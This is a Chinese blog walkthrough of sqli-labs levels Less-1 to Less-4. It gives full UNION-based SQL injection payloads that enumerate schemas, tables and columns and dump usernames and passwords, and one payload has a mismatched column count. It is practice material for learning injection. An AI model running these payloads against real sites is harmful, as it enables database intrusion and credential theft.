sqli-labs Less-1~Less-4做题记录

最新推荐文章于 2022-07-10 15:57:17 发布
最新推荐文章于 2022-07-10 15:57:17 发布
阅读量218 收藏
点赞数
分类专栏: 靶场测试 做题 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/111116603
版权

以下使用sqli-labs靶场进行练习sql注入
关于靶场的搭建,可参考:https://blog.csdn.net/Goodric/article/details/110098085

Less-1

用 ?id=xxx 进行 get 请求,来判断是否存在 sql 注入, 可以在url中看到传递的参数。
输入 ?id=1 and 1 = 2 --+ ,回显正常,此处不是数字型注入。

在这里插入图片描述

再输入?id=1’ (后面加一个), 回显不正常,可能存在sql注入漏洞, 大概率就是字符注入了。
get参数 1 被 ‘ 单引号括在一起。

在这里插入图片描述

用 order by 猜解表中的列数。在order by 后面加数字尝试出有列数有多少。
尝试到4列时报错,所以表中有三列。

在这里插入图片描述

还可以使用union select语句回显 猜解列数union的作用是将两个sql语句进行联合。
使用联合查询需要注意的一个点:
语句 ?id=-1 , 联合查询只有一个回显值 所以要随便选一个不存在的值,即值不能用 1等存在的值,可以等于999、-2等不存在的值
union前后的两个sql语句的选择列数要相同才可以。
union select 1 --+
union select 1,2 --+
union select 1,2,3 --+

一直增加数字,增加到数字不报错时,就可判断当前列数,所以列数就是前一个列数。
这里到数字 3 时回显正确,得到列数为 3。

在这里插入图片描述

使用联合查询,查看回显。
爆mysql版本和操作系统信息
union select 1,version(),@@version_compile_os --+

在这里插入图片描述

爆数据库用户名和数据库名
union select 1,user(),database() --+

在这里插入图片描述

爆数据库路径
union select 1,2,@@datadir --+

在这里插入图片描述

爆出一个数据库
union select 1,null,schema_name from information_schema.schemata limit 0,1 --+

在这里插入图片描述

爆出全部数据库 union select 1,null,group_concat(schema_name) from information_schema.schemata --+

在这里插入图片描述

爆出数据库" security "里的一个表名
union select 1,null,(select table_name from information_schema.tables where table_schema = database() limit 0,1) --+

在这里插入图片描述

爆出数据库" security "里的所有表名
union select 1,null,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

在这里插入图片描述

爆user表的列
从表名" users "中爆出一个字段来
union select 1,null,( select column_name from information_schema.columns where table_schema =database() and table_name=‘users’ limit 0,1) --+

在这里插入图片描述

从表名" users "中爆出全部字段来
union select 1,null,( select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=‘users’ ) --+

在这里插入图片描述

爆所有用户名和密码
从" users “表里对应的列名中爆出一个数据来
union select 1,null,concat(id,0x7e,username,0x7e),password from users limit 0,1 --+
从” users "表里对应的列名中爆出所有数据来
union select 1,null,(select group_concat(concat(id,0x7e,username,0x7e,password)) from users) --+

在这里插入图片描述

Less-2

首先加 ?id=1 ,回显正常,加上单引号 ?id=-1’ ,回显错误
回显语句经翻译为: 以在第 1 行的 “限制 0, 1” 附近使用正确的语法。(似乎把回显的英文语句翻译过来也不知道什么意思,但强迫症还是看看心里舒坦~)
可知单引号影响了闭合,为数字型注入。
所以不添加单引号,也不需要注释了,直接在后面添加语句,进行联合查询。

在这里插入图片描述

例如用 order by 猜解列数。1 后面不需要单引号,最后面不需要注释符。

在这里插入图片描述

后面就和 less-1 的相同,使用联合查询,可进行
爆MySQL的版本和操作系统信息;
爆数据库用户名和数据库名;
爆数据库路径;
爆数据库表名;
爆表中列的字段;
爆列中的数据即用户名和密码。

Less-3

添加 ?id=1’ ,回显错误。
回显语句翻译为:以在行 1 的 “1’) 限制 0, 1” 附近使用正确的语法

在这里插入图片描述

所以构造正确语句:?id=-1’)
同样用 猜解列数 order by 语句尝试一下,同时也不要忘了后面的注释。

在这里插入图片描述

然后就可以进行联合查询,
爆MySQL的版本和操作系统信息;
爆数据库用户名和数据库名;
爆数据库路径;
爆数据库表名;
爆表中列的字段;
爆列中的数据即用户名和密码。

Less-4

注入试探,加单引号 ?id=1’ ,回显正常。 加双引号 ?id=1" ,回显反而是错误的。
翻译回显语句:以选择在第 1 行的 “1”) 限制 0,1 附近使用的正确语法。

在这里插入图片描述

所以构造正确语句: ?id=-1")
用用 猜解列数 order by 语句尝试。

在这里插入图片描述

然后就可以进行联合查询,
爆MySQL的版本和操作系统信息;
爆数据库用户名和数据库名;
爆数据库路径;
爆数据库表名;
爆表中列的字段;
爆列中的数据即用户名和密码。

Goodric
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less 3-4解题思路
qq_35266419的博客
05-09 205
因为Less1-4大同小异,所以这里主要介绍Less-3,谢谢理解 Less-3 GET-Error based-single quotes with twist - string ①寻找注入点,分析出错原因 ②构造URL使之正常回显,此处为字符型注入 ③现在开始爆字段(顺序一般都是爆字段=>数据库=>爆表=>获得列名=>获得表中的username和password)...
Sqli-Labs学习sql注入:Sqli-Labs less-1&2
vegetable_haker的博客
10-25 826
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
sqli-labs(1)-Less-1&2
weixin_30039205的博客
03-01 173
为什么要把这个两个放一起写在博客里呢,因为这两个非常像 当然也有人和我一样不懂为啥他们有的带’,有的又不带,还有带括号的,很多,其实我觉得都是经验之谈 推荐一个i春秋上的帖子,挂上链接,可以看一下,写的挺好的 深入浅出玩转SQL注入(含过狗) 开始我们的题目,sql注入在有的教程里分什么字符型,数字型,其实都是一样的,都是在满足sql查询的条件,同时为什么这么构造,我们也在最后再说 Sql注入基本...
sql-labs-less1/2|SQL注入
TenG的博客
09-18 919
前言: 此系类文章为SQL注入讲解,在本地搭建sql-labs环境进行sql注入,我也是刚开始学sql注入,本篇文章为sql-labs前两关注入讲解,后面的会在学过以后陆续发布,写此系类文章是为了以后方便回顾,也希望能够帮到大家,如果有不正确的地方欢迎指正,由于讲解比较详细,操作过程截图比较多,全文比较干,大家谅解、感谢支持。 所需环境: phpstudy,sql-labs 工具: hackbar,可以不用这个工具,只是为了方便一点,我用的是免费版的。 关卡: Less-1、Less-2 正文: Less-
sqli-labs-master/ Less-4
qq_45052704的博客
07-05 395
SQL学习记录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs-master【Less-3/4】
weixin_44352521的博客
12-10 305
今天我们来学习sqli-labs的第三关! 1. 判断注入的数据类型 http://192.168.228.129/sqli-labs-master/Less-3/?id=1 http://192.168.228.129/sqli-labs-master/Less-3/?id=1 and 1=2 根据url中输入的内容,输入id=1跟id=1 and 1=2结果一样没有变化,所以我们判断是...
Sqli labs系列-less-4 这关好坑!!!
weixin_30855099的博客
08-28 70
这章,可能我总结开会比较长,图比较多,因为,我在做了一半,走进了一个死胡同,脑子,一下子没想开到底为啥。。。。 然后我自己想了好长时间也没想开,我也不想直接就去看源码,所以就先去百度了一下,结果一下子,我又跳进另一个坑了。。。。正如这章的顶图,MySQL语句,我看人家正好用这个分析,为什么大家在构造语句的时候要用这个SQL语句,我自己想了想,我好像没总结这么细,所以就趁着这章,把那个SQL语句的...
sqli-labs通关攻略教程四(less 18~less-22)
m0_55854679的博客
07-11 265
sqli-labs通关攻略教程二(less 1~less-17) less 18 与第一关相同的步骤。首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。 输入正确的用户名和密码,发现页面回显了IP地址,构造的sql语句和浏览器的使用版本一些信息.。若密码输入错误,则无浏览器版本的回显信息。 **注意:**如果你的密码输入admin
sql注入-union select
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。 SQL注入的分类 根据SQL数据类型分类 整型注...
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 8870
sql注入中的union联合查询,union select 1,2,3
sqli-labs靶场实现(一)【GET基于报错的SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 707
一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 ...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 836
看完不会来打我
sqli-labs靶场实现(六)【HTTP头中的SQL注入】(less-18~19(User-Agent、Referer)、具体步骤+图文详解)
weixin_46709219的博客
12-26 628
一)HTTP头中的SQL注入   1)HTTP头中的注入介绍   2)HTTP User-Agent注入   3)HTTP Referer注入   4)sqlmap安全测试 ———————————————————————————————————————————————————————— 一)HTTP头中的SQL注入 1)HTTP头中的注入介绍 上面代码中使用的方法解析: 1)check_input()——判断是否有输入一个变量$value 2)empty()——判断变量$value的值是否为空 3)
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值